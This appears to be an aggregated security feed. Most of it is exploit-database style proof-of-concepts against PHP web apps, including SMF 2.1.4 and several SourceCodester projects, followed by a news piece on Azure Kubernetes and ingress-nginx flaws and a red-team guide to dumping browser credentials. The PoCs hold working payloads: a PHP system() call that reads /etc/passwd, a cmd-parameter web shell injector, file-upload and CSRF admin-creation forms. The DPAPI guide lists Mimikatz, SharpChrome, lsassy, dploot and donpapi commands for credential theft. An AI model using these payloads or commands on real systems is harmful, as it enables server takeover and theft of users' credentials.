Simple Machines Forum version 2.1.4 suffers from an authenticated code injection vulnerability.

    # Exploit Title:  Authenticated Code Injection - smfv2.1.4# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 2.1.4# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.htmlCode Injection Authenticated:Steps to Reproduce:1. Login as admin2. Browse to "Current Theme"3. Click on "Modify Themes" > "SMF Default Theme"4. Click on Admin.template.php5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')?>"// HTTP POST request showing the code injection payloadPOST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7[...]entire_file[]=<?php+system('cat /etc/passwd') ?>[...]// HTTP response showing /etc/passwd contentsHTTP/1.1 200 OKServer: ApachePragma: no-cache[...][...]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin[...]

Simple Machines Forum 2.1.4 Code Injection

Biobook Social Networking Site version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : biobook Social Networking Site 1.0 Remote File Upload Vulnerability                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 7.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<div id="right-nav">      <h1>Update Status</h1>  <div>      <form method="post" action="http://127.0.0.1/social/post.php" enctype="multipart/form-data">        <textarea placeholder="Whats on your mind?" name="content" class="post-text" required=""></textarea>        <input type="file" name="image">        <button class="btn-share" name="Submit" value="Log out">Share</button>      </form>  </div>      </div>    [+] http://127.0.0.1/social/upload/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Biobook Social Networking Site 1.0 Arbitrary File Upload

Accounting Journal Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Accounting Journal Management System 1.0 php code injection Vulnerability                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload injects code of your choice into an HTML page. 

       You give it a name and save it in the root directory of the script. and executes it remotely.

[+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want.

[+] Line 11 :  Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

[+] save payload as poc.html 

[+] Set your target url

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Accounting Journal Management System 1.0 Code Injection

ABIC Cardiology Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ABIC cardiology Management System 1.0 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://abicegypt.com/                                                                                                      |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 7 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="panel panel-default panel-table">  
                <div class="panel-heading"> <h2 class="text-center">New User </h2>  
                </div>  
                <div class="panel-body">  
                  <div class="col-md-offset-2 col-md-8">

<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">

            <div class="form-group"> User Name  
                <input type="text" name="username" class="form-control" placeholder="Insert User Name">  
            </div>  
            <div class="form-group"> Password  
                <input type="text" name="password" class="form-control" placeholder="Insert Password">  
            </div>

      <div class="col-xs-12">  
                <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>  
            </div>  
  <input type="hidden" name="MM_insert" value="form1">  
</form>

              </div>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

Hospital Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip                                  |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4  :  Make sure to include your database connection here

[+] Line 60 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php

// عنوان الخادم الخارجي  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// جلب البيانات من الخادم الخارجي  
$response = file_get_contents($url);

// التحقق من وجود البيانات  
if ($response !== FALSE) {  
    // التعامل مع البيانات  
    echo $response;  
} else {  
    echo 'حدث خطأ أثناء جلب البيانات.';  
}

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $email = $con->real_escape_string($_POST['email']);  
    $mobnum = $con->real_escape_string($_POST['mobnum']);

        $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {  
        echo '<script>alert("Contact Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}

?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Admin | Update Contact Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {  
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent();  
            const email = document.getElementById('email').value;  
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('email', email);  
            formData.append('mobnum', mobnum);  
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('Contact Us content has been updated successfully.');  
                console.log(data);  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto;  
            padding: 20px;  
            text-align: center;  
        }

        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
                            </div>  
                            <ol class="breadcrumb">  
                                <li class="active">  
                                    <span>Update Contact Us Content</span>  
                                </li>  
                            </ol>  
                        </div>  
                    </section>  
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="email">Email</label>  
                                            <input id="email" name="email" type="email" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="mobnum">Mobile Number</label>  
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
            </div>  
        </div>  
    </div>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hospital Management System 1.0 Code Injection

Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : admin_class.php    $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";    if(!empty($_FILES['cover']['tmp_name'])){      $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));      $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);      $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';      $hostName = $_SERVER['HTTP_HOST'];      $path =explode('/',$_SERVER['PHP_SELF']);      $currentPath = '/'.$path[1];       if($move){            $data .= ", cover_img='$fname' ";      }    }  [+] Line 27 : Set your target url.[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Manage About Page</title>        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script></head><body>    <div class="container mt-5">        <div class="col-lg-12">            <div class="card card-outline card-primary">                <div class="card-body">                    <form action="" id="manage-about">                        <div class="form-group">                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>                            </textarea>                        </div>                    </form>                </div>                <div class="card-footer border-top border-info">                    <div class="d-flex w-100 justify-content-center align-items-center">                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>                    </div>                </div>            </div>        </div>    </div>    <script>        $(document).ready(function(){            // Initialize Summernote Editor            $('.summernote2').summernote({                height: 300,                toolbar: [                    ['style', ['style']],                    ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],                    ['fontname', ['fontname']],                    ['fontsize', ['fontsize']],                    ['color', ['color']],                    ['para', ['ol', 'ul', 'paragraph', 'height']],                    ['table', ['table']],                    ['insert', ['link', 'picture']],                    ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]                ],                callbacks: {                    onImageUpload: function(files) {                        saveImg(files[0]);  // Handle image upload                    }                }            });            // Function to save uploaded image            function saveImg(_file) {                var data = new FormData();                data.append("file", _file);                $.ajax({                    data: data,                    type: "POST",                    url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",                    cache: false,                    contentType: false,                    processData: false,                    success: function(resp) {                        var image = $('<img>').attr('src', resp);                        $('.summernote2').summernote("insertNode", image[0]);                    }                });            }        });        // Form Submission        $('#manage-about').submit(function(e) {            e.preventDefault();            start_load();  // Start a loading indicator (you need to define this function)            $.ajax({                url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                success: function(resp) {                    if(resp == 1) {                        alert_toast('Data successfully saved', "success");                        end_load();  // End the loading indicator (you need to define this function)                    }                }            });        });        // Optional: Define start_load and end_load functions        function start_load() {            // Add your loading indicator logic here        }        function end_load() {            // Remove your loading indicator logic here        }        function alert_toast(message, type) {            alert(message); // Basic alert. Replace with a better toast notification if needed.        }    </script></body></html>[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Event Registration and Attendance System 1.0 Code Injection

In today's rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the infamous Log4Shell vulnerability as an example, and demonstrates how Application Detection and

Anatomy of an Attack

Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.
"An attacker with command execution in a Pod running within an affected Azure Kubernetes Services cluster could download the configuration used to

Vulnerability / Container Security

Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.

"An attacker with command execution in a Pod running within an affected Azure Kubernetes Services cluster could download the configuration used to provision the cluster node, extract the transport layer security (TLS) bootstrap tokens, and perform a TLS bootstrap attack to read all secrets within the cluster," Google-owned Mandiant said.

Clusters using "Azure CNI" for the "Network configuration" and "Azure" for the "Network Policy" have been found to be impacted by the privilege escalation bug. Microsoft has since addressed the issue following responsible disclosure.

The attack technique devised by the threat intelligence firm hinges on accessing a little-known component called Azure WireServer to request a key used to encrypt protected settings values ("wireserver.key") and use it to decode a provisioning script that includes several secrets such as follows -

*   KUBELET\_CLIENT\_CONTENT (Generic Node TLS Key)
*   KUBELET\_CLIENT\_CERT\_CONTENT (Generic Node TLS Certificate)
*   KUBELET\_CA\_CRT (Kubernetes CA Certificate)
*   TLS\_BOOTSTRAP\_TOKEN (TLS Bootstrap Authentication Token)

"KUBELET\_CLIENT\_CONTENT, KUBELET\_CLIENT\_CERT\_CONTENT, and KUBELET\_CA\_CRT can be Base64 decoded and written to disk to use with the Kubernetes command-line tool kubectl to authenticate to the cluster," researchers Nick McClendon, Daniel McNamara, and Jacob Paullus said.

"This account has minimal Kubernetes permissions in recently deployed Azure Kubernetes Service (AKS) clusters, but it can notably list nodes in the cluster."

TLS\_BOOTSTRAP\_TOKEN, on the other hand, could be used to enable a TLS bootstrap attack and ultimately gain access to all secrets used by running workloads. The attack does not require the pod to be running as root.

"Adopting a process to create restrictive NetworkPolicies that allow access only to required services prevents this entire attack class," Mandiant said. "Privilege escalation via an undocumented service is prevented when the service cannot be accessed at all."

The disclosure comes as Kubernetes security platform ARMO highlighted a new high-severity Kubernetes flaw (CVE-2024-7646, CVSS score: 8.8) that affects the ingress-nginx controller and could permit a malicious actor to gain unauthorized access to sensitive cluster resources.

"The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects," security researcher Amit Schendel said.

"The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller's credentials, which, in default configurations, has access to all secrets in the cluster."

It also follows the discovery of a design flaw in the Kubernetes git-sync project that could allow for command injection across Amazon Elastic Kubernetes Service (EKS), Azure Kubernetes Service (AKS), Google Kubernetes Engine (GKE), and Linode.

"This design flaw can cause either data exfiltration of any file in the pod (including service account tokens) or command execution with the git\_sync user privileges," Akamai researcher Tomer Peled said. "To exploit the flaw, all an attacker needs to do is apply a YAML file on the cluster, which is a low-privilege operation."

There are no patches being planned for the vulnerability, making it crucial that organizations audit their git-sync pods to determine what commands are being run.

"Both vectors are due to a lack of input sanitization, which highlights the need for a robust defense regarding user input sanitization," Peled said. "Blue team members should be on the lookout for unusual behavior coming from the gitsync user in their organizations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover TLS Bootstrap Attack on Azure Kubernetes Clusters

Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data such as credentials using the… 
Continue reading → Web Browser Stored Credentials

Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data such as credentials using the _CryptProtectData_ and _CryptUnprotectData_ functions. Browsers such as Chrome and Edge utilize DPAPI to encrypt credentials prior to storage. The master key is stored locally and can be decrypted with the password of the user, which then is used to decrypt DPAPI data blobs.

In the world of red team operations, locations which credentials are stored are always a target as it will allow access to other applications or lateral movement. Organizations which are utilizing Microsoft Edge or Google Chrome for storage the credentials of their users are vulnerable due to the abuse of CryptUnprotectData API (T1555.003). It should be noted that reading credentials stored in browsers doesn’t require any form of elevation and it is challenging for defensive teams to detect due to the high volume of events which are generated in case of monitoring.

Master keys are located in the following path and by default are not visible as these are classified as protected operating system files.

    C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\<MasterKey>

User Master Keys

Mimikatz was the first tool that interacted with DPAPI, and has specific modules to perform decryption operations. However, the Mimikatz encrypted key parser is broken and therefore it can no longer be used to decrypt DPAPI blobs as it fails with a message of _No Alg and/or key handle_. Instead of using Mimikatz, it is feasible to harvest the encrypted key from “_Local State_” by executing the following command from a PowerShell console:

(gc "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State" | ConvertFrom-Json).os\_crypt.encrypted\_key

Local State – Encrypted Key

The encrypted key can be ingested in the Mimikatz _dpapi::chrome_ module to decrypt the contents of “_Login Data_“.

    dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

Mimikatz – DPAPI Decrypt

SharpDPAPI is a C# port of the Mimikatz DPAPI functionality which enables in-memory based execution. Master keys can be retrieved by executing the following command:

    dotnet inline-execute SharpDPAPI.exe masterkeys /rpc

ShaprDPAPI – User Master Keys

SharpDPAPI – GUID & Decryption Keys

SharpChrome is part of the SharpDPAPI and targets sensitive information stored in Chromium based browsers such as Chrome, Edge and Brave. The tool will attempt to read and decrypt the AES key from the “_Local State_” file using the cryptographic function BCrypt. The API _CryptUnprotectData()_ is used to decrypt passwords stored in browsers.

    dotnet inline-execute SharpChrome logins

SharpChrome – DPAPI

An alternative tool called CredentialKatz implements a different method as credentials are dumped directly from the credential manager of Chrome or Edge. This method is more evasive as it attempts to inject into an existing browser process and read credentials and doesn’t utilize DPAPI for decryption. Offline parsing of credentials is also supported via a minidump file. CredentialKatz harvest passwords from credential manager in plain-text by using the _PasswordReuseDetectorImpl_ class.

    CredentialKatz.exe

CredentialKatz

**Domain Backup Key**

In the event that domain administrator access has been achieved the DPAPI backup key can be retrieved from the domain controller to decrypt master keys from any user in the domain. The backup key is stored in the following Active Directory location:

DPAPI – Backup Key

Mimikatz support remote dumping of the backup key by executing the following command:

    lsadump::backupkeys /system:dc.red.lab /export

Domain Backup Key

The exported backup key can be used in conjunction with the master key of the target user to decrypt the encryption key.

    dpapi::masterkey /in:"C:\Users\peter\AppData\Roaming\Microsoft\Protect\S-1-5-21-955986923-3279314952-43775158-1105\15e65bfa-6f2b-4abc-8199-c53e32c31d6f" /pvk:backupkey.pvk

Decrypt Master Key Mimikatz

Similarly, this activity can be performed by SharpDPAPI. If no .pvk file is specified the key will be displayed in the console.

    dotnet inline-execute SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab

DPAPI Domain Backup Key

    SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab /file:backupkey.pvk

DPAPI Domain Backup Key File

**Non-Domain Joined**

There is sufficient tooling to implement DPAPI operations remotely from a non-domain joined systems. Utilization of lsassy can retrieve various information including master keys. Executing of the following command will retrieve and store master keys into a file.

    lsassy -d purple.lab -u Administrator -p Password123 10.0.1.2 -m rdrleakdiag -M masterkeys

lsassy Master Keys

The master keys file can be imported to dploot, a python implementation of SharpDPAPI, in conjunction with the browser flag. The tool will authenticate with the target host via SMB and will dump credentials and cookies stored in Microsoft Edge and Google Chrome. _dploot_ retrieves the AES key from the “_Local State_” file and then decrypts the credentials stored in the “_Login Data_” file.

    dploot browser -d purple.lab -u Administrator -p Password123 10.0.1.2 -mkfile /home/kali/masterkeys

dploot – Browser Credentials

it is also feasible to harvest master keys from _dploot_ with the _masterkeys_ flag.

    dploot masterkeys -d purple.lab -u Administrator -p Password123 10.0.1.2

dploot – Master key

Similar operations can be performed with donpapi.

    donpapi red/Administrator:Password123@10.0.0.2 -o /home/kali

DonPapi

The majority of the tools discussed in this article following a specific sequence of events. If the tool is executing from a non-domain joined host (aka Linux), an SMB connection is initiated and then contents of the Local State file are read in order to decrypt the AES key before concluding the attack with the decryption of the passwords stored in the Login Data. Tools which are executed in memory from an implant are omitting the SMB connection. Except of CredentialKatz which implements a different approach all the other tools can be considered similar. The following image displays the sequence of events.

DPAPI – Linux

**Rate this:**

**Post navigation**

Web Browser Stored Credentials

Missing Authorization When Using @AuthorizeReturnObject in Spring Security 6.3.0 and 6.3.1 allows attacker to render security annotations inaffective.

**Spring Security Missing Authorization vulnerability**

Moderate severity GitHub Reviewed Published Aug 20, 2024 to the GitHub Advisory Database • Updated Aug 20, 2024

Tag

#auth